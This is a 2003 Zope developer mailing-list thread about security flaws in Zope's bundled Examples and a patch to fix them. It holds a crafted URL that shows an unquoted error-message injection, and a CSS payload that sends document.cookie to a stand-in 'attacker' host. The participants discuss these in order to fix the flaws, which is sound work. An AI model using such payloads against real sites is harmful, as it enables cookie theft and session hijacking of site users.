Re: [Zope-dev] weak examples, weak exploits
On Mon, Jun 23, 2003 at 10:33:42AM -0400, Casey Duncan wrote: > I would be in favor of making the Examples "opt-in" like the Zope > tutorial. It seems silly to have it in evey ZODB by default. Make people > add it if they want it. Moreover, the examples installed everywhere attract spam to [EMAIL PROTECTED] (forwarded to [EMAIL PROTECTED]). I have seen numerous 'increase website traffic' spams explicitly mentioning /Examples URLs around the net. -- Martijn Pieters | Software Engineer mailto:[EMAIL PROTECTED] | Zope Corporation http://www.zope.com/ | Creators of Zope http://www.zope.org/ - ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
Jamie Heilman wrote: > Then call it http://host/aww_shit_now_what=old+flava' er, http://host/aww_shit_now_what?i=old+flava' rather. -- Jamie Heilman http://audible.transient.net/~jamie/ "Paranoia is a disease unto itself, and may I add, the person standing next to you may not be who they appear to be, so take precaution." -Sathington Willoughby ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
seb bacon wrote: > The file upload vulnerability was fixed in version 1.3 of Examples.zexp, > though. The reason it's still turning up in 2.6.x versions is probably > due to upgrades. Therefore I suppose additionally there should be a > patch which examines the ZODB on startup and prints a warning if an old > Examples folder is present. I opted for a patch that simply removes all the magic auto-install crud and goes for the installer link on the quick-start page. As for previous zope installations, well, I don't feel like trying to figure out how to examine the zodb and warn people if they've got bad examples still installed, it strikes me as too much junk in the startup procedure which is already too slow as it is. I say chalk it up as a lessoned learned and move on. As for my reworked examples, I added missing quoting to the navigation examples, size limits and entry limits to the guest book, size limits and entry limits to the file library, and additional sanity checking and robustness to just about everything. Examining the original advisory this is how I break it down: 1) moot with the addition of SiteErrorLog 2) Examples/db no longer exists in the Examples, I'm unaware if it ever did, at any rate, not a problem 3) moot with the addition of SiteErrorLog 3a) this is a problem, see below 3b) fixed in my reworking 3c) I was unable to reproduce this, maybe a bug with older Zopes? extra notes) wtf? I have no idea what the the advisory author was trying to say by including that diff, and I have feeling he doesn't know either. I mean, it has the words 'examples' and 'security' in it, but that doesn't make it relevant. There is unfortunately, a snag. One of the exploits (3a) as it turns out is actually a problem deeper down. To isolate a test case make a script like: ## Script (Python) "aww_shit_now_what" ##bind container=container ##bind context=context ##bind namespace= ##bind script=script ##bind subpath=traverse_subpath ##parameters=i ##title= ## return int(i) Then call it http://host/aww_shit_now_what=old+flava' This can be disarmed by ensuring that in your standard_error_message you quote the results of error_msg, however this isn't the default, and it will result in a lot of broken and ugly looking (albeit safer) error pages. I haven't fully figured out exactly whats going on with that whole thing yet. I have a feeling its atributable to either raise_standardErrorMessage's "smart" tag searching, or some other auto-magical aspect of the error handling framework. (clues appreciated) In the mean time I suggest quoting error_msg. -- Jamie Heilman http://audible.transient.net/~jamie/ "...thats the metaphorical equivalent of flopping your wedding tackle into a lion's mouth and flicking his lovespuds with a wet towel, pure insanity..." -Rimmer ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
Casey Duncan wrote: > I would be in favor of making the Examples "opt-in" like the Zope > tutorial. It seems silly to have it in evey ZODB by default. Make > people add it if they want it. I aggree. Casey Duncan wrote: > Actually the add form could be linked from the Quick Start page to make it > really stupid simple. Totally. Patch and reworked Examples may be found at http://collector.zope.org/Zope/956 -- Jamie Heilman http://audible.transient.net/~jamie/ "Paranoia is a disease unto itself, and may I add, the person standing next to you may not be who they appear to be, so take precaution." -Sathington Willoughby ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
Andy McKay wrote: Casey Duncan wrote: I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it. +1 a simple "How to add the examples to the ZODB" at the top of the help would be good. Mind you I really dont want the HelpSys in my ZODB either :) Removing the help system could also appreciably boost startup time. I can't remember the last time I used the help system, yet it creates a ZCatalog for each Zope product. It would beneficial to allow users to disable it completely. Shane ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
On Monday 23 June 2003 12:00 pm, Andy McKay wrote: > Casey Duncan wrote: > > I would be in favor of making the Examples "opt-in" like the Zope tutorial. It > > seems silly to have it in evey ZODB by default. Make people add it if they > > want it. > > +1 a simple "How to add the examples to the ZODB" at the top of the help > would be good. Mind you I really dont want the HelpSys in my ZODB either :) Actually the add form could be linked from the Quick Start page to make it really stupid simple. -Casey ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
Casey Duncan wrote: I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it. +1 a simple "How to add the examples to the ZODB" at the top of the help would be good. Mind you I really dont want the HelpSys in my ZODB either :) -- Andy McKay http://www.agmweb.ca ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
On Mon, 23 Jun 2003 01:20:35 -0700 Jamie Heilman <[EMAIL PROTECTED]> wrote: > http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt [snip] > apps, and apart from 1 and 3 there are probably legitimate bugs there. related issues: CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a, as far as the site permits to anonymous users or person without good references to write. To cope with the matter, I stupidly put multiple string substitution. t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'',t) t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'',t) t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'',t) It would be appreciated if someone advices me more general and smart way. I know that Zope's StructuredText itself does not handle such a case, and that kind of implementaition may be left to each developer. If it had ability to avoid them, it would be much better, I think. Another example Following sample may allow malicious.css import from outside of the site. Put #1 or #2 to a StructuredText page. #1 http://attacker/malicious.css";> #2 @import url('http://attacker/malicious.css'); # expample of malicious.css http://attacker/malicious.css body { left: expression(eval( 'document.location="http://attacker/"+document.cookie;')) } For example, make a 'Document' in a CMFDefault site, and put #1 to the reply form, DiscussionItem, against the original document, etc. It seems CMFDefault is vulnerable to this attack. Any general remedy for that kind of exploit? -- Kazuya Fukamachi ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it. -Casey On Monday 23 June 2003 05:12 am, Jamie Heilman wrote: > seb bacon wrote: > > No. Just go ahead and make the changes. It would be instructive for > > others reading the examples to add a comment or two explaining the > > rationale behind the extra checking code. > > 'k I can do that > > > The file upload vulnerability was fixed in version 1.3 of Examples.zexp, > > though. The reason it's still turning up in 2.6.x versions is probably > > due to upgrades. Therefore I suppose additionally there should be a > > patch which examines the ZODB on startup and prints a warning if an old > > Examples folder is present. > > You know, ironically, I don't think this "advisory" even covers that hole. > There's obvious DoS potential in the guest book and such, but thats > easily limited without degrading the value of the example. Anyway, > I'll scrape over the examples and see what I can clean up. > > -- > Jamie Heilman http://audible.transient.net/~jamie/ > "Most people wouldn't know music if it came up and bit them on the ass." > -Frank Zappa > > ___ > Zope-Dev maillist - [EMAIL PROTECTED] > http://mail.zope.org/mailman/listinfo/zope-dev > ** No cross posts or HTML encoding! ** > (Related lists - > http://mail.zope.org/mailman/listinfo/zope-announce > http://mail.zope.org/mailman/listinfo/zope ) > ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
seb bacon wrote: > No. Just go ahead and make the changes. It would be instructive for > others reading the examples to add a comment or two explaining the > rationale behind the extra checking code. 'k I can do that > The file upload vulnerability was fixed in version 1.3 of Examples.zexp, > though. The reason it's still turning up in 2.6.x versions is probably > due to upgrades. Therefore I suppose additionally there should be a > patch which examines the ZODB on startup and prints a warning if an old > Examples folder is present. You know, ironically, I don't think this "advisory" even covers that hole. There's obvious DoS potential in the guest book and such, but thats easily limited without degrading the value of the example. Anyway, I'll scrape over the examples and see what I can clean up. -- Jamie Heilman http://audible.transient.net/~jamie/ "Most people wouldn't know music if it came up and bit them on the ass." -Frank Zappa ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
On Mon, 2003-06-23 at 09:20, Jamie Heilman wrote: > I'll submit a fixed Examples.zexp but I need to know how its normally > prepared, ownership, etc. Is there anything special I should do? No. Just go ahead and make the changes. It would be instructive for others reading the examples to add a comment or two explaining the rationale behind the extra checking code. The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present. seb ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
[Zope-dev] weak examples, weak exploits
http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt This hit the full-disclosure list the other day. Vulnerabilities 1 and 3 are moot and have been since the introduction of SiteErrorLog. Although if the responsible parties had bothered digging a little deeper they'd have found the BCI HTTP headers and likely thrown a fit. Anyway, if you can wade your way past the all the spelling errors you'll see the 0day exploits are your typical abuse of badly code web apps, and apart from 1 and 3 there are probably legitimate bugs there. Your predictable response: There's just examples. Uninstall them. They shouldn't be left on a production system. Sure, you know that, I know that, my cat knows that. Joe Six Pack told me he knew, but he didn't care. Which tends to the be the consensus. But thats no excuse to be shipping bad examples. They should be fixed, bad examples are worse than no examples at all. I'll submit a fixed Examples.zexp but I need to know how its normally prepared, ownership, etc. Is there anything special I should do? -- Jamie Heilman http://audible.transient.net/~jamie/ "I was in love once -- a Sinclair ZX-81. People said, "No, Holly, she's not for you." She was cheap, she was stupid and she wouldn't load -- well, not for me, anyway." -Holly ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )